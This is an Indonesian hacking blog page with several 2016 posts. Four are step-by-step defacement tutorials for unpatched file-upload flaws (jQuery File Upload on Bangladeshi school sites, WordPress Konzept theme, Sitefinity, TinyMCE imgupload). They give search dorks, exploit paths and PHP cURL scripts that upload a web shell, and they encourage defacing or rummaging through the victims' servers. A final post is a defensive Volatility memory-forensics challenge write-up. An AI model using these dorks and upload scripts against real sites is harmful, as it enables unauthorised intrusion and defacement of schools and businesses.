Sabtu, 30 April 2016

Deface website sekolah Bangladesh


Hello World ; Pagi Fans, Please Say Hello Haters :*
xixixhi, Nuenomaru disini. uih ini thread Pertama atau artikel pembukaan di Blog ini pada bulan Mei 2016 ^_^ dari ane :* *btw ibu ane ultah gengs :v pas bet tgl muda. *yehh lov u mom <3
yokaii, lanjut bahas ini thread, kali Ini Nue bakal Share Tutorial Deface website sekolah Bangladesh, Sebenernya sih ini Tutorial sama kok sama kek Jquery File Upload
yups ini bedanya gegara dorknya aja menjuru ke website Sekolahan .bd (bangladesh).
ya kyk bug balitbang lah kalo di indo.

Bugnya ada di plugin jquery-file-upload.


yaudah langsung aja.


Dork:
Developed by exdmania
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.

exploit: /assets/super_admin/vendor/jquery-file-upload/server/php/


3. Vulnerability ~ sama deh kek Jquery


udh gak verawan, bnyak bet yang gangbang :'(

4. Buat File Baru Berekstensi .php Contoh ven.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn ven.php tadi

<?php
$file = "shelllo.php"; //shell ataupun script deface
$post = array("files[]" => "@$file",
      );
     $ch2 = curl_init ("www.target.bd/assets/super_admin/vendor/jquery-file-upload/server/php/");
     curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
     curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
     curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
     curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
     curl_setopt ($ch2, CURLOPT_POST, 1);
     curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
     $data = curl_exec ($ch2);
     echo $data."\n\n\n";
     ?>

5. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
6. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php

7. jika sukses , akan muncul nama shell sobat di CMD,dan akan terlihat seperti di SS.


8. Shell Akses: www.target.bd/assets/super_admin/vendor/jquery-file-upload/server/php/files/

Done~ Ganteng Ganteng #SWAG akwkawk


Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) ))
*Hargai karya webmaster, kalo bisa bantu report Bug ke adminnya, atau bantu patch dgn seikhlas anda*
#Ganteng2PercumaKaloGakPunyaIman :* awkkawkwa



Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")


bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Defaced~
Sekian dan semoga bermanfaat .. terimakasih


source and thanks toindoXploit



./Nuenomaru




Hei apa kabar mu jauh disana :'D














Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Jumat, 29 April 2016

WordPress Theme Konzept Arbitrary File Upload Vulnerability

Hello World ; Sore Fans, Please Say Hello Haters :*
Mumpung lagi di Corner wifi.id Telkom bareng ank2 TKJ Cyber Art, sempetin deh buat Posting dan isengin para wifi seeker awkkaw *gretonger
xixixhi, Nuenomaru disini, Sekarang Nue akan Share Tutorial WordPress Theme Konzept Arbitrary File Upload Vulnerability *ini exploit lama sih wkwkw

exploit ini salah satu bug/celah yang ada pada theme di CMS WordPress.
iseng2 aja share, Kali aja masih crotz wkwkw *yg master minggir dlu ;*


Langsung intip tutorialnya ;*
Dork : 
inurl:/wp-content/themes/konzept/
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)


1. Dorking di search Engine

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.

exploit: 
/wp-content/themes/konzept/includes/uploadify/upload.php


3. Vulnerability ~ {"jsonrpc" : "2.0", "result" : null, "id" : "id"}

Kurang lebihnya sih gituh :v

4. Buat File Baru Berekstensi .php Contoh konzept.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn konzept.php tadi
*btw disini shell ente, ubah dulu ekstensinya jadi .JPG

<?php

$url = "http://127.0.0.1"; // put URL Here
$post = array
(
        "file" => "@namashell.jpg",
        "name" => "namashell.php"
);

$ch = curl_init ("www.target.co.li/wp-content/themes/konzept/includes/uploadify/upload.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);

echo $data;


?>

5. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
6. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php


7. jika sukses , akan muncul nama shell sobat di CMD,dan akan terlihat seperti di SS.


8. Shell Akses: www.target.coli/wp-content/themes/konzept/includes/uploadify/uploads/namashell.php

Done~ Ganteng Ganteng #SWAG akwkawk

Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) ))

*Hargai karya webmaster, kalo bisa bantu report Bug ke adminnya, atau bantu patch dgn seikhlas anda*
#Ganteng2PercumaKaloGakPunyaIman :* awkkawkwa



Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy WordPress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih



source and thanks to: 0day




./Nuenomaru


Kadang Hidup perlu di Tertawakan









Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Selasa, 26 April 2016

eXploit CMS Sitefinity Editor Dialogs File Upload Vulnerability

Hello World ; Siang Fans, Please Say Hello Haters :*
xixixhi, Nuenomaru disini, Sekarang Nue akan Share Tutorial Deface dengan eXploit 
Sitefinity CMS (ASP.NET) Shell Upload Vulnerability *ini exploit lama sih wkwkw
exploit ini salah satu bug/celah yang ada pada theme di CMS WordPress.
iseng2 aja share, Kali aja masih crotz wkwkw *yg master minggir dlu ;*

Lanjut intip tutorialnya Gaes :*
Mau sampai Kapan ?!


Dork : 
inurl:"/Sitefinity/login.aspx"
"UserControls/Dialogs"
"Sitefinity: Login"
(kembangin lg gunakan otak vokepers kalean, agar dpt yg vuln n verawan)

1. Dorking di search Engine

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.
exploit: /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx

3. Vulnerability ~ Muncul tampilan Form Upload


4. Langsung ajeh Upload Shell/File yang ingin lu upload gengs ^_^



5. Jika berhasil terUpload akan muncul nama file/shell lu gengs ^_^



6. Shell/File Akses o.O ??
disini kak-> www.target.co.li/Files/x.aspx


yg gagal upload shell, maenkan Bypass Shell mu kak awkkaw~

Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) ))

*Hargai karya webmaster, kalo bisa bantu report Bug ke adminnya, atau bantu patch dgn seikhlas anda*
#Ganteng2PercumaKaloGakPunyaIman :* awkkawkwa



Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")
Rameikan juga Grup FB: BackBox Jakarta Team
#JoinUs #GoOpenSource

Kunjungi Juga: Forum BackBox Indonesia

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Sitefinity Defaced !!
Sekian dan semoga bermanfaat .. terimakasih



source and thanks to: Groosec Squad





./Nuenomaru















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Senin, 25 April 2016

eXploit Tinymce Images File Upload Vulnerability

Mau sampai kapan ?!

Hello World ; Malam Fans, Please Say Hello Haters :*
xixixhi, Nuenomaru disini, Sekarang Nue akan Share Tutorial eXploit Tinymce Images File Upload Vulnerable

xixixhi yoii masih seputar Bug/Celah pada TinyMCE, baca juga Tutorial eXploit TinyMCE Ajax File Manager RCE
xixihi, ini tutorial Nue dapet dari Blog Official Marsel *tengkyu artikel tutorialnya.


Langsung intip tutorialnya :*


Dork : 
inurl:/imgupload/ fileuploader.php
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)


1. Dorking di search Engine

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.

exploit: /[path]
/extlib/tinymce/plugins/imgupload/fileuploader.php


3. Vulnerability ~ {"error":"No files were uploaded."}


kurang lebihnya sih kek gitu <(")

4. Buat File Baru Berekstensi .php Contoh tinymce.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga gambar/file yg ingin di upload sobat di directory yang sama dgn tinymce.php tadi

<?php
$uploadfile="namagambar.jpg";
$ch = curl_init("www.target.co.li/[path]/extlib/tinymce/plugins/imgupload/fileuploader.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

5. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
6. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php


7. jika sukses , akan muncul nama file sobat di CMD,dan akan keluar lengkap link akses file ente




Langsung cek awkwakaw



Note: File ekstensi hanya bisa: JPG, JPEG, PDF , GIF, PNG, TIF, TIFF , BMP


Ouhiya awkkwak, kalo ada yang berhasil Bypass Shell nya utk exploit ini,, kirim tutorialnya ke fanspage kami yah awkwak >.< ..
nanti akan kami posting disini, dgn anda sebagai author tutorialnya ^_^

xixihi tengkyu sebelumnya :*


Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Defaced~
Sekian dan semoga bermanfaat .. terimakasih



source and thanks to:Official Marsel | Phantom Ghost | Sulawesi IT Sec


./Nuenomaru





bakar dlu Nikotinnya, seruput lagi Caffeine nya ^_^
#enjoyed














Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Sabtu, 23 April 2016

Tutorial Memory Forensic dengan Volatility

Hello World; , Malam Fans, Please say hello Haters ;)
Nuenomaru disini, awkkawka.. kali ini Gua bakal Share Tutorial Memory Forensic dengan Volatility
ditutor ini sedikit bagaimana cara menggunakan Volatility dan sedikit perintah dan beberapa fungsinya.
ditutor ini, Gua mempraktekan di Kali Linux, silahkan coba di pinguin2 kesayangan anda ;)
btw apa itu Volatility o.O ?? cek mbah google gengs :*

Yoks langsung aja, Terdapat Challenge Memory Forensic yang diberikan oleh Indonesia Digital Forensic Community pada halaman facebook nya.
Berikut adalah Pertanyaan Challenge tersebut:

Challenge bisa didownload disini
Detail File Challenge :

Name : RAM.mem
MD5 : 47ca9f4ef6549705a9337166ac45ea82

Size : 536809472 bytes


Banyak sekali tool yang dapat digunakan untuk melakukan memory forensic, tapi saya memilih volatility untuk mengerjakan Challenge ini, karena volatility powerfull dan mudah digunakan. Untuk penggunaka distro pentest seperti kali linux dan backbox seperti Volatility sudah terinstall otomatis, dan untuk distro linux yang belum terinstall volatility bisa langsung mengunjungi situs resmi nya di ( http://www.volatilityfoundation.org/ ). Volatility ditulis menggunakan bahasa python jadi tidak menutup kemungkinan dapat berjalan di platform Windows, tapi pada tutorial ini saya menggunakan linux dan semua step nya sama saja dengan os-os lain.

Langsung intip tutorialnya ;*

syntaxt umum :

volatility -f FileName <Options>

Pertama Ekstrak dulu filenya:


 Lalu Buka terminal anda gengs ^_^


Pertanyaan nomor 1 :  Identifikasi jenis OS-nya
Untuk identifikasi jenis os nya kita dapat menggunakan Pluginimageinfo


Ketik Perintah: volatility -f RAM.mem imageinfo


pada bagian Suggested Profile(s) dapat kita lihat bahwa RAM.mem didump pada os Windows XP.
Tapi kenapa ada muncul 2 , WinXPSP2 Dan WinXPSP3 ? Iyaa karena itu profile yang tersedia pada   Volatility yang dapat kita gunakan untuk melakukan kegiatan seperti melihat prosses, history dan sebagai nya menggunakan Volatility.

Pertanyaan Nomo 2 :  Identifikasi proses yang mencurigakan

Untuk indentifikasi proses kita bisa menggunakan salah satu Pluginpslist, psscan serta pstreekarena ketiga Plugin tersebut digunakan untuk melihat running proses.

Ketik Perintah: volatility -f RAM.mem --profile=WinXPSP2x86 pslist


Dari output tersebut kita dapat menentukan proses mana yang mencurigakan, dan gua perhatikan ada proses dengan nama wscript.exepada pid 584, metsvc.exe pada pid 1644 serta qNPEwOBAwGzOSN.Pada pid 1760. karena gua mencuriguakan ketiga proses tersebut merupakan payload dari metasploit ( https://www.offensive-security.com/metasploit-unleashed/interacting-metsvc/).

Pertanyaan  nomo 3 : Identifikasi remote IP yang mentriger proses tersebut

Untuk indentifikasi remote ip tentu kita harus mengecek connection layak nya kita menggunakan netstat, Plugin yang digunakan untuk proses ini bisa kita gunakan connections untuk melihat koneksi yang terbukan ( Windows XP dan Windows Server 2003) serta connscanuntuk melihat koneksi TCP

Ketik Perintah: volatility -f RAM.mem --profile=WinXPSP2x86 connections

Lalu ketik Perintah: volatility -f RAM.mem --profile=WinXPSP2x86 connscan


terdapat 2 ip yang mempunyai remote koneksi, terus yang mana ini yang bener ? Karena kita tadi mencurigai ini merupakan payload metsvc metasploit, jadi kita coba melihat history internet explore apakah korban mengakses sesuatu yang menyebabkan payload ini bisa dieksekusi di PC korban

Lalu Ketik Perintah: volatility -f RAM.mem --profile=WinXPSP2x86 iehistory


Terdapat koneksi ke http://192.168.88.44:8080/payloads/trojan.exedan http://192.168.88.44:8080/payloads/.  Dan tentu kita semua tau ini adalah payload dari metasploit yang kita curigrai sebelum nya.
Ternyata IP yang  mentriger proses tersebut adalah ip 192.168.88.44


Pertanyaan nomor 5 :  Apakah tipe malware yang menginfeksi komputer tersebut
Untuk mengetahui tipe dari malware yang menginfeksi tentu kita bisa menggunakan anti virus, dan agar bisa di scan menggunakan anti virus tentu malware tersebut harus ada, oleh karena itu kita bisa dump malware tersebut dengan Plugin procdump.


Ingat !! proses mencurigakan yang kita kumpulkan pada soal nomor 2 adalah  wscript.exe pada pid584, metsvc.exe pada pid 1644 serta qNPEwOBAwGzOSN. Pada pid 1760, tapi disini kita hanya perlu dump file  metsvc.exe dan qNPEwOBAwGzOSN. Karena wscript tersebut ada karena adanya file trojan.exe tadi sehingga wscript menciptakan proses qNPEwOBAwGzOSN.

Ketik Perintah: mkdir virus
Lalu Ketik perintah: 
volatility -f RAM.mem --profile=WinXPSP2x86 procdump -p 1644,1760 -D virus



Output dari dump tersebut berada pada directory virus. Selanjutnya mari kita scanning dengan http://virustotal.com/

Hasil Scan Virustotal :

executable.1644.exe 
Detectionratio:16/57

executable.1760.exe
Detection ratio:44 / 55 


Tipe malware tersebut adalah Trojan

Pertanyaan nomor nomor 6 : Apakah dikomputer tersebut terinstall antivirus 
Untuk melihat apakah dikomputer ini terinstall antivirus kita bisa menggunakan plugin shimcache

Ketik Perintah:

volatility -f RAM.mem --profile=WinXPSP2x86 shimcache


Ternyata komputer tersebut menggunakan Anti-Virus Kaspersky Internet Security.

Pertanyaan nomor  7 : Temukan aplikasi atau service yang "vulnerable" yang mungkin dimanfaatkan oleh si hacker untuk masuk ke dalam komputer tersebut


Sebenar nya gua bingung untuk menjawab pertanyaan ini karena pengetahuan saya yang masih kurang, kita dilihat dari proses yang running tidak melihat adanya vulnerable applications, tapi untuk mengecek service nya bisa menggunakan plugin svcscan.

Ketik Perintah: volatility -f RAM.mem --profile=WinXPSP2x86 svscan




Pada service metsvc tersebut tercipta karena ada nya payload metasploit yang dieksekusi pada komputer korban. Jadi saya simpulkan bahwa service yang vulnrable itu metsvc nya



Untuk pertanyaan bonus nomor 8 masih menjadi misteri, karena sampai saat ini saya belum bisa mengambil file tersebut, file yang dimaksud adalah file account.txt yang terletak di C:/Documents and Settings/WINVICTIM/My Documents/

Yak bagi kalian yang bisa memecahkan pertanyaan nomor 8 Bisa dishare tutorial/write Up nya ke fanspage kami ^_^ .. nanti akan kami posting ke blog ini, dengan source and thanks to Nick anda sebagai penulis tutorial :)

Mudahkan x_O ? gimana o.O ?? udh kek lagi berasa dipilem2 hekel and pentestel ya gengs o.O ? awkawkwka
Stay Cool and Keep ./Crotz , gaes <(")

Salam para penjinak pinguin :v , Penunggang Naga,  Viva Real Tux Warrior Gaes :'v wkkwkwkw


bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Pentesting | Memory Forensic
Sekian dan semoga bermanfaat .. terimakasih





Thanks Tutorial dan Write Upnya bang Aiden_
Source and thanks to: forum BackBox Indonesia




./Nuenomaru



Topi kebelakang, Mata ku jauh Menatap KeDepan ;)
















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
 

ande ande lumoet Template by Ipietoon Cute Blog Design